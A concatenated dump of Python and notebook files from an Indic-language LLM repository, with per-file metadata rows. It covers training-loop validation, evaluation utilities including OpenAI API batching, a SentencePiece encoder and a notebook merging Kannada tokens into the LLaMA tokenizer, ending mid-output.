accelerator.gather(val_total_loss).mean().item()
/ args.gradient_accumulation_steps
/ len(val_dataloader)
)
logger.info(f" Step: {completed_steps}, Val Loss: {avg_val_loss}")
if args.with_tracking:
accelerator.log(
{
"val_loss": avg_val_loss,
},
step=completed_steps,
)
if avg_val_loss < best_loss:
best_loss = avg_val_loss
output_dir = f"best"
if args.output_dir is not None:
output_dir = os.path.join(args.output_dir, output_dir)
accelerator.wait_for_everyone()
save_with_accelerate(accelerator, model, tokenizer, output_dir, args)
# ----------------------------------------------------------------------------
output_dir = f"epoch_{epoch}"
if args.output_dir is not None:
output_dir = os.path.join(args.output_dir, output_dir)
accelerator.wait_for_everyone()
save_with_accelerate(accelerator, model, tokenizer, output_dir, args)
if args.with_tracking:
accelerator.end_training()
if args.output_dir is not None:
if args.val_file is not None:
# ----------------------------------------------------------------------------
# evaluation on held out set
# ----------------------------------------------------------------------------
val_total_loss = 0
for step, batch in enumerate(val_dataloader):
if "labels" not in batch:
batch["labels"] = batch["input_ids"].clone()
if "attention_mask" not in batch:
batch["attention_mask"] = torch.ones_like(batch["input_ids"])
with torch.inference_mode():
outputs = model(**batch, use_cache=False)
loss = outputs.loss
val_total_loss += loss.detach().float()
avg_val_loss = (
accelerator.gather(val_total_loss).mean().item()
/ args.gradient_accumulation_steps
/ len(val_dataloader)
)
logger.info(f" Step: {completed_steps}, Val Loss: {avg_val_loss}")
if args.with_tracking:
accelerator.log(
{
"val_loss": avg_val_loss,
},
step=completed_steps,
)
if avg_val_loss < best_loss:
best_loss = avg_val_loss
output_dir = f"best"
if args.output_dir is not None:
output_dir = os.path.join(args.output_dir, output_dir)
accelerator.wait_for_everyone()
save_with_accelerate(accelerator, model, tokenizer, output_dir, args)
# ----------------------------------------------------------------------------
accelerator.wait_for_everyone()
save_with_accelerate(accelerator, model, tokenizer, args.output_dir, args)
if args.with_tracking:
accelerator.end_training()
if __name__ == "__main__":
main() | 46,833 | Python | .py | 1,041 | 33.591739 | 281 | 0.581979 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,508 | utils.py | adithya-s-k_Indic-llm/archives/eval/utils.py | import torch
import tqdm
import json
import time
import asyncio
import os
from importlib import import_module
from transformers import StoppingCriteria
from eval.finetune import encode_with_prompt_completion_format
from eval.dispatch_openai_requests import (
dispatch_openai_chat_requesets,
dispatch_openai_prompt_requesets,
)
class KeyWordsCriteria(StoppingCriteria):
def __init__(self, stop_id_sequences):
assert isinstance(
stop_id_sequences[0], list
), "stop_id_sequences should be a list of list of ids"
self.stop_sequences = stop_id_sequences
def __call__(self, input_ids: torch.LongTensor, scores: torch.FloatTensor, **kwargs) -> bool:
sequences_should_be_stopped = []
for i in range(input_ids.shape[0]):
sequence_should_be_stopped = False
for stop_sequence in self.stop_sequences:
if input_ids[i][-len(stop_sequence) :].tolist() == stop_sequence:
sequence_should_be_stopped = True
break
sequences_should_be_stopped.append(sequence_should_be_stopped)
return all(sequences_should_be_stopped)
@torch.no_grad()
def generate_completions(
model,
tokenizer,
prompts,
batch_size=1,
stop_id_sequences=None,
add_special_tokens=True,
disable_tqdm=False,
**generation_kwargs,
):
generations = []
if not disable_tqdm:
progress = tqdm.tqdm(total=len(prompts), desc="Generating Completions")
num_return_sequences = generation_kwargs.get("num_return_sequences", 1)
for i in range(0, len(prompts), batch_size):
batch_prompts = prompts[i : i + batch_size]
tokenized_prompts = tokenizer(
batch_prompts,
padding="longest",
return_tensors="pt",
add_special_tokens=add_special_tokens,
)
batch_input_ids = tokenized_prompts.input_ids
attention_mask = tokenized_prompts.attention_mask
if model.device.type == "cuda":
batch_input_ids = batch_input_ids.cuda()
attention_mask = attention_mask.cuda()
try:
batch_outputs = model.generate(
input_ids=batch_input_ids,
attention_mask=attention_mask,
stopping_criteria=[KeyWordsCriteria(stop_id_sequences)]
if stop_id_sequences
else None,
**generation_kwargs,
)
# the stopping criteria is applied at batch level, so if other examples are not stopped, the entire batch will continue to generate.
# so some outputs still have the stop sequence, which we need to remove.
if stop_id_sequences:
for output_idx in range(batch_outputs.shape[0]):
for token_idx in range(batch_input_ids.shape[1], batch_outputs.shape[1]):
if any(
batch_outputs[
output_idx, token_idx : token_idx + len(stop_sequence)
].tolist()
== stop_sequence
for stop_sequence in stop_id_sequences
):
batch_outputs[output_idx, token_idx:] = tokenizer.pad_token_id
break
# remove the prompt from the output
# we need to re-encode the prompt because we need to make sure the special tokens are treated the same way as in the outputs.
# we changed our previous way of truncating the output token ids dicrectly because some tokenizer (e.g., llama) won't add space token before the first token.
# space is important for some tasks (e.g., code completion).
batch_outputs = tokenizer.batch_decode(batch_outputs, skip_special_tokens=True)
batch_prompts = tokenizer.batch_decode(batch_input_ids, skip_special_tokens=True)
# duplicate the prompts to match the number of return sequences
batch_prompts = [
prompt for prompt in batch_prompts for _ in range(num_return_sequences)
]
batch_generations = [
output[len(prompt) :] for prompt, output in zip(batch_prompts, batch_outputs)
]
except Exception as e:
print("Error when generating completions for batch:")
print(batch_prompts)
print("Error message:")
print(e)
print("Use empty string as the completion.")
batch_generations = [""] * len(batch_prompts) * num_return_sequences
generations += batch_generations
# for prompt, generation in zip(batch_prompts, batch_generations):
# print("========")
# print(prompt)
# print("--------")
# print(generation)
if not disable_tqdm:
progress.update(len(batch_prompts) // num_return_sequences)
assert (
len(generations) == len(prompts) * num_return_sequences
), "number of generations should be equal to number of prompts * num_return_sequences"
return generations
@torch.no_grad()
def get_next_word_predictions(
model,
tokenizer,
prompts,
candidate_token_ids=None,
batch_size=1,
return_token_predictions=False,
add_special_tokens=True,
disable_tqdm=False,
):
predictions, probs = [], []
if not disable_tqdm:
progress = tqdm.tqdm(total=len(prompts), desc="Getting Predictions")
for i in range(0, len(prompts), batch_size):
batch_prompts = prompts[i : i + batch_size]
tokenized_prompts = tokenizer(
batch_prompts,
padding="longest",
return_tensors="pt",
add_special_tokens=add_special_tokens,
)
batch_input_ids = tokenized_prompts.input_ids
attention_mask = tokenized_prompts.attention_mask
if model.device.type == "cuda":
batch_input_ids = batch_input_ids.cuda()
attention_mask = attention_mask.cuda()
batch_logits = model(input_ids=batch_input_ids, attention_mask=attention_mask).logits[
:, -1, :
]
batch_probs = torch.softmax(batch_logits, dim=-1)
if candidate_token_ids is not None:
batch_probs = batch_probs[:, candidate_token_ids]
batch_prediction_indices = torch.argmax(batch_probs, dim=-1)
if return_token_predictions:
if candidate_token_ids is not None:
candidate_tokens = tokenizer.convert_ids_to_tokens(candidate_token_ids)
batch_predictions = [candidate_tokens[idx] for idx in batch_prediction_indices]
else:
batch_predictions = tokenizer.convert_ids_to_tokens(batch_prediction_indices)
predictions += batch_predictions
else:
predictions += batch_prediction_indices.tolist()
probs += batch_probs.tolist()
if not disable_tqdm:
progress.update(len(batch_prompts))
assert len(predictions) == len(
prompts
), "number of predictions should be equal to number of prompts"
return predictions, probs
@torch.no_grad()
def score_completions(model, tokenizer, scoring_examples, disable_tqdm=False):
"""
Each scoring example is a dict, which contains the following keys:
- prompt: the prompt to score
- completions: a list of completions to score
"""
if not disable_tqdm:
progress = tqdm.tqdm(total=len(scoring_examples), desc="Scoring Completions")
# unroll the scoring examples
unrolled_examples = []
for scoring_example in scoring_examples:
prompt = scoring_example["prompt"]
for completion in scoring_example["completions"]:
unrolled_examples.append({"prompt": prompt, "completion": completion})
scores = []
# currently we don't support batching, because we want to directly use the loss returned by the model to score each completion.
for unrolled_example in unrolled_examples:
encoded_example = encode_with_prompt_completion_format(
unrolled_example, tokenizer, max_seq_length=None
)
# unsqueeze the batch dimension
for key, value in encoded_example.items():
encoded_example[key] = value.unsqueeze(0)
if model.device.type == "cuda":
encoded_example = {key: value.cuda() for key, value in encoded_example.items()}
outputs = model(**encoded_example)
loss = outputs.loss
scores.append(-loss.item())
if not disable_tqdm:
progress.update(1)
# roll up the scores
rolled_up_scores = {}
for unrolled_example, score in zip(unrolled_examples, scores):
prompt = unrolled_example["prompt"]
completion = unrolled_example["completion"]
if prompt not in rolled_up_scores:
rolled_up_scores[prompt] = {}
rolled_up_scores[prompt][completion] = score
return rolled_up_scores
def load_hf_lm_and_tokenizer(
model_name_or_path,
tokenizer_name_or_path=None,
device_map="auto",
torch_dtype="auto",
load_in_8bit=False,
convert_to_half=False,
gptq_model=False,
use_fast_tokenizer=True,
padding_side="left",
):
from transformers import AutoModelForCausalLM, AutoTokenizer, OPTForCausalLM, GPTNeoXForCausalLM
if gptq_model:
from auto_gptq import AutoGPTQForCausalLM
model_wrapper = AutoGPTQForCausalLM.from_quantized(
model_name_or_path, device="cuda:0", use_triton=True
)
model = model_wrapper.model
elif load_in_8bit:
model = AutoModelForCausalLM.from_pretrained(
model_name_or_path, device_map=device_map, load_in_8bit=True
)
else:
if device_map:
model = AutoModelForCausalLM.from_pretrained(
model_name_or_path, device_map=device_map, torch_dtype=torch_dtype
)
else:
model = AutoModelForCausalLM.from_pretrained(
model_name_or_path, torch_dtype=torch_dtype
)
if torch.cuda.is_available():
model = model.cuda()
if convert_to_half:
model = model.half()
model.eval()
if not tokenizer_name_or_path:
tokenizer_name_or_path = model_name_or_path
try:
tokenizer = AutoTokenizer.from_pretrained(
tokenizer_name_or_path, use_fast=use_fast_tokenizer
)
except:
# some tokenizers (e.g., GPTNeoXTokenizer) don't have the slow or fast version, so we just roll back to the default one
tokenizer = AutoTokenizer.from_pretrained(tokenizer_name_or_path)
# set padding side to left for batch generation
tokenizer.padding_side = padding_side
# set pad token to eos token if pad token is not set (as is the case for llama models)
if tokenizer.pad_token is None:
tokenizer.pad_token = tokenizer.eos_token
tokenizer.pad_token_id = tokenizer.eos_token_id
# for OPT and Pythia models, we need to set tokenizer.model_max_length to model.config.max_position_embeddings
# to avoid wrong embedding index.
if isinstance(model, GPTNeoXForCausalLM) or isinstance(model, OPTForCausalLM):
tokenizer.model_max_length = model.config.max_position_embeddings
print(
"Set tokenizer.model_max_length to model.config.max_position_embeddings: {}".format(
model.config.max_position_embeddings
)
)
return model, tokenizer
def query_openai_chat_model(
engine,
instances,
output_path=None,
batch_size=10,
retry_limit=5,
reuse_existing_outputs=True,
**completion_kwargs,
):
"""
Query OpenAI chat model and save the results to output_path.
`instances` is a list of dictionaries, each dictionary contains a key "prompt" and a key "id".
"""
existing_data = {}
if reuse_existing_outputs and output_path is not None and os.path.exists(output_path):
with open(output_path, "r") as f:
for line in f:
instance = json.loads(line)
existing_data[instance["id"]] = instance
# by default, we use temperature 0.0 to get the most likely completion.
if "temperature" not in completion_kwargs:
completion_kwargs["temperature"] = 0.0
results = []
if output_path is not None:
fout = open(output_path, "w")
retry_count = 0
progress_bar = tqdm.tqdm(total=len(instances))
for i in range(0, len(instances), batch_size):
batch = instances[i : i + batch_size]
if all([x["id"] in existing_data for x in batch]):
results.extend([existing_data[x["id"]] for x in batch])
if output_path is not None:
for instance in batch:
fout.write(json.dumps(existing_data[instance["id"]]) + "\n")
fout.flush()
progress_bar.update(batch_size)
continue
messages_list = []
for instance in batch:
messages = [{"role": "user", "content": instance["prompt"]}]
messages_list.append(messages)
while retry_count < retry_limit:
try:
outputs = asyncio.run(
dispatch_openai_chat_requesets(
messages_list=messages_list,
model=engine,
**completion_kwargs,
)
)
retry_count = 0
break
except Exception as e:
retry_count += 1
print(f"Error while requesting OpenAI API.")
print(e)
print(f"Sleep for {30*retry_count} seconds.")
time.sleep(30 * retry_count)
print(f"Retry for the {retry_count} time.")
if retry_count == retry_limit:
raise RuntimeError(
f"Failed to get response from OpenAI API after {retry_limit} retries."
)
assert len(outputs) == len(batch)
for instance, output in zip(batch, outputs):
instance[f"output"] = output["choices"][0]["message"]["content"]
instance["response_metadata"] = output
results.append(instance)
if output_path is not None:
fout.write(json.dumps(instance) + "\n")
fout.flush()
progress_bar.update(batch_size)
return results
def query_openai_model(
engine,
instances,
output_path=None,
batch_size=10,
retry_limit=5,
reuse_existing_outputs=True,
**completion_kwargs,
):
"""
Query OpenAI chat model and save the results to output_path.
`instances` is a list of dictionaries, each dictionary contains a key "prompt" and a key "id".
"""
existing_data = {}
if reuse_existing_outputs and output_path is not None and os.path.exists(output_path):
with open(output_path, "r") as f:
for line in f:
instance = json.loads(line)
existing_data[instance["id"]] = instance
# by default, we use temperature 0.0 to get the most likely completion.
if "temperature" not in completion_kwargs:
completion_kwargs["temperature"] = 0.0
results = []
if output_path is not None:
fout = open(output_path, "w")
retry_count = 0
progress_bar = tqdm.tqdm(total=len(instances))
for i in range(0, len(instances), batch_size):
batch = instances[i : i + batch_size]
if all([x["id"] in existing_data for x in batch]):
results.extend([existing_data[x["id"]] for x in batch])
if output_path is not None:
for instance in batch:
fout.write(json.dumps(existing_data[instance["id"]]) + "\n")
fout.flush()
progress_bar.update(batch_size)
continue
messages_list = []
for instance in batch:
messages = instance["prompt"]
messages_list.append(messages)
while retry_count < retry_limit:
try:
outputs = asyncio.run(
dispatch_openai_prompt_requesets(
prompt_list=messages_list,
model=engine,
**completion_kwargs,
)
)
retry_count = 0
break
except Exception as e:
retry_count += 1
print(f"Error while requesting OpenAI API.")
print(e)
print(f"Sleep for {30*retry_count} seconds.")
time.sleep(30 * retry_count)
print(f"Retry for the {retry_count} time.")
if retry_count == retry_limit:
raise RuntimeError(
f"Failed to get response from OpenAI API after {retry_limit} retries."
)
assert len(outputs) == len(batch)
for instance, output in zip(batch, outputs):
instance[f"output"] = output["choices"][0]["text"]
instance["response_metadata"] = output
results.append(instance)
if output_path is not None:
fout.write(json.dumps(instance) + "\n")
fout.flush()
progress_bar.update(batch_size)
return results
def dynamic_import_function(function_path):
"""
Dynamically import a function from a path string (e.g., "module.submodule.my_function")
"""
module_path, function_name = function_path.rsplit(".", 1)
module = import_module(module_path)
function = getattr(module, function_name)
return function | 17,769 | Python | .py | 417 | 32.395683 | 169 | 0.61017 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,509 | dispatch_openai_requests.py | adithya-s-k_Indic-llm/archives/eval/dispatch_openai_requests.py | """
This file is copied and modified from https://gist.github.com/neubig/80de662fb3e225c18172ec218be4917a.
Thanks to Graham Neubig for sharing the original code.
"""
import openai
import asyncio
from typing import Any, List, Dict
async def dispatch_openai_chat_requesets(
messages_list: List[List[Dict[str, Any]]],
model: str,
**completion_kwargs: Any,
) -> List[str]:
"""Dispatches requests to OpenAI chat completion API asynchronously.
Args:
messages_list: List of messages to be sent to OpenAI chat completion API.
model: OpenAI model to use.
completion_kwargs: Keyword arguments to be passed to OpenAI ChatCompletion API. See https://platform.openai.com/docs/api-reference/chat for details.
Returns:
List of responses from OpenAI API.
"""
async_responses = [
openai.ChatCompletion.acreate(
model=model,
messages=x,
**completion_kwargs,
)
for x in messages_list
]
return await asyncio.gather(*async_responses)
async def dispatch_openai_prompt_requesets(
prompt_list: List[str],
model: str,
**completion_kwargs: Any,
) -> List[str]:
"""Dispatches requests to OpenAI text completion API asynchronously.
Args:
prompt_list: List of prompts to be sent to OpenAI text completion API.
model: OpenAI model to use.
completion_kwargs: Keyword arguments to be passed to OpenAI text completion API. See https://platform.openai.com/docs/api-reference/completions for details.
Returns:
List of responses from OpenAI API.
"""
async_responses = [
openai.Completion.acreate(
model=model,
prompt=x,
**completion_kwargs,
)
for x in prompt_list
]
return await asyncio.gather(*async_responses)
if __name__ == "__main__":
chat_completion_responses = asyncio.run(
dispatch_openai_chat_requesets(
messages_list=[
[{"role": "user", "content": "Write a poem about asynchronous execution."}],
[{"role": "user", "content": "Write a poem about asynchronous pirates."}],
],
model="gpt-3.5-turbo",
temperature=0.3,
max_tokens=200,
top_p=1.0,
)
)
for i, x in enumerate(chat_completion_responses):
print(f"Chat completion response {i}:\n{x['choices'][0]['message']['content']}\n\n")
prompt_completion_responses = asyncio.run(
dispatch_openai_prompt_requesets(
prompt_list=[
"Write a poem about asynchronous execution.\n",
"Write a poem about asynchronous pirates.\n",
],
model="text-davinci-003",
temperature=0.3,
max_tokens=200,
top_p=1.0,
)
)
for i, x in enumerate(prompt_completion_responses):
print(f"Prompt completion response {i}:\n{x['choices'][0]['text']}\n\n") | 2,995 | Python | .py | 80 | 29.5 | 164 | 0.631198 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,510 | test.py | adithya-s-k_Indic-llm/archives/tokenisation/test.py | import argparse
import sentencepiece as spm
class SentencePieceEncoder:
def __init__(self, model_path):
self.model_path = model_path
def encode_text(self, input_text):
sp = spm.SentencePieceProcessor(model_file=self.model_path)
encoded_text = sp.encode(input_text, out_type=str)
return encoded_text
def run(self):
parser = argparse.ArgumentParser(
description="Encode text using a SentencePiece model."
)
parser.add_argument(
"--model-path",
required=True,
help="Path to the trained SentencePiece model file.",
)
parser.add_argument(
"--input-text",
required=True,
help="Text to be encoded.",
)
args = parser.parse_args()
self.model_path = args.model_path
encoded_text = self.encode_text(args.input_text)
print(encoded_text)
if __name__ == "__main__":
sp_encoder = SentencePieceEncoder(
model_path="tamil_sp.model"
) # Provide the path to your trained model here
sp_encoder.run()
| 1,119 | Python | .py | 32 | 26.53125 | 67 | 0.61467 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,511 | tokenizer.ipynb | adithya-s-k_Indic-llm/archives/tokenisation/tokenizer.ipynb | {
"cells": [
{
"cell_type": "code",
"execution_count": 9,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"32000 20000\n",
"['<s>', '</s>', '<unk>']\n",
"[1, 2, 0]\n",
"{'bos_token': '<s>', 'eos_token': '</s>', 'unk_token': '<unk>'}\n"
]
}
],
"source": [
"# Based on https://github.com/ymcui/Chinese-LLaMA-Alpaca/blob/main/scripts/merge_tokenizer/merge_tokenizers.py\n",
"import os\n",
"\n",
"os.environ[\"PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION\"] = \"python\"\n",
"import argparse\n",
"\n",
"import sentencepiece as spm\n",
"from sentencepiece import sentencepiece_model_pb2 as sp_pb2_model\n",
"from transformers import LlamaTokenizer\n",
"\n",
"llama_tokenizer_dir = \"meta-llama/Llama-2-7b-hf\"\n",
"kannada_sp_model_file = \"./kannada_tokeniser_models/kannada_sp.model\"\n",
"\n",
"# load\n",
"llama_tokenizer = LlamaTokenizer.from_pretrained(meta-llama/Llama-2-7b-hf)\n",
"# kannada_sp_model = spm.SentencePieceProcessor()\n",
"# kannada_sp_model.Load(kannada_sp_model_file)\n",
"\n",
"llama_spm = sp_pb2_model.ModelProto()\n",
"llama_spm.ParseFromString(llama_tokenizer.sp_model.serialized_model_proto())\n",
"\n",
"kannada_spm = sp_pb2_model.ModelProto()\n",
"kannada_spm.ParseFromString(kannada_sp_model.serialized_model_proto())\n",
"\n",
"# print number of tokens\n",
"print(len(llama_tokenizer), len(kannada_sp_model))\n",
"print(llama_tokenizer.all_special_tokens)\n",
"print(llama_tokenizer.all_special_ids)\n",
"print(llama_tokenizer.special_tokens_map)\n"
]
},
{
"cell_type": "code",
"execution_count": 10,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"32000\n",
"Before:32000\n",
"New model pieces: 49600\n",
"Added 17600 Tokens\n",
"Common Tokens 2400\n"
]
}
],
"source": [
"## Add kannada tokens to LLaMA tokenizer\n",
"llama_spm_tokens_set = set(p.piece for p in llama_spm.pieces)\n",
"print(len(llama_spm_tokens_set))\n",
"print(f\"Before:{len(llama_spm_tokens_set)}\")\n",
"for p in kannada_spm.pieces:\n",
" piece = p.piece\n",
" if piece not in llama_spm_tokens_set:\n",
" new_p = sp_pb2_model.ModelProto().SentencePiece()\n",
" new_p.piece = piece\n",
" new_p.score = 0\n",
" llama_spm.pieces.append(new_p)\n",
"print(f\"New model pieces: {len(llama_spm.pieces)}\")\n",
"\n",
"print(f\"Added {len(llama_spm.pieces)-len(llama_spm_tokens_set)} Tokens\")\n",
"print(f\"Common Tokens {len(kannada_sp_model)-(len(llama_spm.pieces)-len(llama_spm_tokens_set))}\")"
]
},
{
"cell_type": "code",
"execution_count": 11,
"metadata": {},
"outputs": [
{
"name": "stderr",
"output_type": "stream",
"text": [
"You are using the default legacy behaviour of the <class 'transformers.models.llama.tokenization_llama.LlamaTokenizer'>. This is expected, and simply means that the `legacy` (previous) behavior will be used so nothing changes for you. If you want to use the new behaviour, set `legacy=False`. This should only be set if you understand what it means, and thoroughly read the reason why this was added as explained in https://github.com/huggingface/transformers/pull/24565\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"kannada-LLaMA tokenizer has been saved to final_tokenizer_hf\n"
]
}
],
"source": [
"## Save\n",
"output_sp_dir = \"final_tokenizer_sp\"\n",
"output_hf_dir = \"final_tokenizer_hf\" # the path to save kannada-LLaMA tokenizer\n",
"os.makedirs(output_sp_dir, exist_ok=True)\n",
"with open(output_sp_dir + \"/kannada_llama.model\", \"wb\") as f:\n",
" f.write(llama_spm.SerializeToString())\n",
"tokenizer = LlamaTokenizer(vocab_file=output_sp_dir + \"/kannada_llama.model\")\n",
"\n",
"tokenizer.save_pretrained(output_hf_dir)\n",
"print(f\"kannada-LLaMA tokenizer has been saved to {output_hf_dir}\")"
]
},
{
"cell_type": "code",
"execution_count": 17,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"['<s>', '</s>', '<unk>']\n"
]
}
],
"source": [
"# Test\n",
"from transformers import AutoTokenizer, LlamaTokenizer\n",
"\n",
"llama_tokenizer = LlamaTokenizer.from_pretrained(\"meta-llama/Llama-2-7b-hf\")\n",
"kannada_llama_tokenizer = LlamaTokenizer.from_pretrained(\"Cognitive-Lab/Ambari-7B-base-v0.1\")\n",
"gemma_tokenizer = AutoTokenizer.from_pretrained(\"google/gemma-7b\")\n",
"print(tokenizer.all_special_tokens)"
]
},
{
"cell_type": "code",
"execution_count": 18,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[1, 2, 0]\n",
"{'bos_token': '<s>', 'eos_token': '</s>', 'unk_token': '<unk>'}\n",
"Test text:\n",
" \n",
"ರಸ್ತುತ ದಿನಗಳಲ್ಲಿ ಸ್ಮಾರ್ಟ್ಫೋನ್ಗಳು ಮಾತ್ರವಲ್ಲ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳು ಕೂಡ ಸಿಕ್ಕಾಪಟ್ಟೆ ಸೌಂಡ್ ಮಾಡುತ್ತಿವೆ. ಫಿಟ್ನೆಸ್ ಆಧಾರಿತ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಿಗೆ ಟೆಕ್ ವಲಯದಲ್ಲಿ ಭಾರಿ ಬೇಡಿಕೆ ಇದೆ. ಇದೇ ಕಾರಣಕ್ಕೆ ಹಲವು ಕಂಪೆನಿಗಳು ವೈವಿಧ್ಯಮಯ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳನ್ನು ಪರಿಚಯಿಸಿವೆ. ಇವುಗಳಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಕೂಡ ಬಳಕೆದಾರರ ನೆಚ್ಚಿನ ಬ್ರಾಂಡ್ ಎನಿಸಿಕೊಂಡಿದೆ. ಸದ್ಯ ಅಮಾಜ್ಫಿಟ್ ತನ್ನ ವಿಭಿನ್ನ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಿಂದ ಗುರುತಿಸಿಕೊಂಡಿದೆ. ಇದೀಗ ತನ್ನ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳ ಮೇಲೆ ಭರ್ಜರಿ ಡಿಸ್ಕೌಂಟ್ ಅನ್ನು ನೀಡುತ್ತಿದೆ.\n",
"ಹೌದು, ಅಮಾಜ್ಫಿಟ್ ಕಂಪೆನಿ ತನ್ನ ಕೆಲವು ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳ ಮೇಲೆ ಬಿಗ್ ಡಿಸ್ಕೌಂಟ್ ನೀಡುತ್ತಿದೆ. ನೀವು ಕೂಡ ಅಮಾಜ್ಫಿಟ್ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳನ್ನು ರಿಯಾಯಿತಿ ದರದಲ್ಲಿ ಖರೀದಿಸಲು ಬಯಸಿದರೆ ಇದು ಉತ್ತಮ ಸಮಯವಾಗಿದೆ. ಅದರಲ್ಲೂ ಜನಪ್ರಿಯ ಸ್ಮಾರ್ಟ್ವಾಚ್ಗಳಾದ ಅಮಾಜ್ಫಿಟ್ ಜಿಟಿಎಸ್ 2 ಮಿನಿ, ಬಿಪ್ ಯು ಪ್ರೊ ಮತ್ತು ಬಿಪ್ಯು ವಾಚ್ಗಳಿಗೆ ರಿಯಾಯಿತಿ ಘೋಷಿಸಿದೆ. ಹಾಗಾದ್ರೆ ಅಮಾಜ್ಫಿಟ್ ವಾಚ್ಗಳಿಗೆ ಯಾವೆಲ್ಲಾ ರಿಯಾಯಿತಿ ದೊರೆಯುತ್ತಿದೆ ಅನ್ನೊದನ್ನ ಈ ಲೇಖನದಲ್ಲಿ ತಿಳಿಸಿಕೊಡ್ತೀವಿ ಓದಿರಿ.\n",
"ಆನ್ಲೈನ್ ಶಾಪಿಂಗ್ ದೈತ್ಯ ಅಮೆಜಾನ್ ಸೈಟ್ನಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಬ್ರಾಂಡ್ ಡೇ ಸೇಲ್ ಲೈವ್ ಆಗಿದೆ. ಅಲ್ಲದೆ ಅಮಾಜ್ ಫಿಟ್ ನ ಅಧಿಕೃತ ವೆಬ್ ಸೈಟ್ ನಲ್ಲಿ ಕೂಡ ರಿಯಾಯಿತಿ ಸೇಲ್ ಲೈವ್ ಆಗಿದೆ. ಈ ಸೇಲ್ ಇದೇ ಸೆಪ್ಟೆಂಬರ್ 12 ರವರೆಗೆ ನಡೆಯಲಿದೆ. ಇದರಲ್ಲಿ ಅಮಾಜ್ಫಿಟ್ ಜಿಟಿಎಸ್ 2 ಮಿನಿ ಅಮೆಜಾನ್ನಲ್ಲಿ ಮಾತ್ರ ಲಭ್ಯವಿದೆ. ಆದರೆ ಬಿಪ್ ಯು ಮತ್ತು ಬಿಪ್ ಯು ಪ್ರೊ ಫ್ಲಿಪ್ಕಾರ್ಟ್ನಲ್ಲಿ ರಿಯಾಯಿತಿ ದರದಲ್ಲಿ ಲಭ್ಯವಾಗಲಿದೆ.\n",
"\n",
"Tokenized by LLaMA tokenizer:['▁', '<0x0A>', 'ರ', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '▁', '<0xE0>', '<0xB2>', '<0xA6>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0xA8>', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '<0xE0>', '<0xB2>', '<0xBF>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xAB>', '<0xE0>', '<0xB3>', '<0x8B>', '<0xE0>', '<0xB2>', '<0xA8>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA4>', '್', 'ರ', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xB2>', '್', '<0xE0>', '<0xB2>', '<0xB2>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '್', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', 'ರ', '್', '<0xE0>', '<0xB2>', '<0x9F>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0xB5>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0x9A>', '್', '\\u200c', '<0xE0>', '<0xB2>', '<0x97>', '<0xE0>', '<0xB2>', '<0xB3>', '<0xE0>', '<0xB3>', '<0x81>', '▁', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB3>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB2>', '<0xBF>', '<0xE0>', '<0xB2>', '<0x95>', '್', '<0xE0>', '<0xB2>', '<0x95>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xAA>', '<0xE0>', '<0xB2>', '<0x9F>', '್', '<0xE0>', '<0xB2>', '<0x9F>', '<0xE0>', '<0xB3>', '<0x86>', '▁', '<0xE0>', '<0xB2>', '<0xB8>', '<0xE0>', '<0xB3>', '<0x8C>', '<0xE0>', '<0xB2>', '<0x82>', '<0xE0>', '<0xB2>', '<0xA1>', '್', '\\u200c', '▁', '<0xE0>', '<0xB2>', '<0xAE>', '<0xE0>', '<0xB2>', '<0xBE>', '<0xE0>', '<0xB2>', '<0xA1>', '<0xE0>', '<0xB3>', '<0x81>', '<0xE0>', '<0xB2>', '<0xA4>', '್', '<0xE0>', '<0xB2>', '<0xA4>', '<0xE0>', 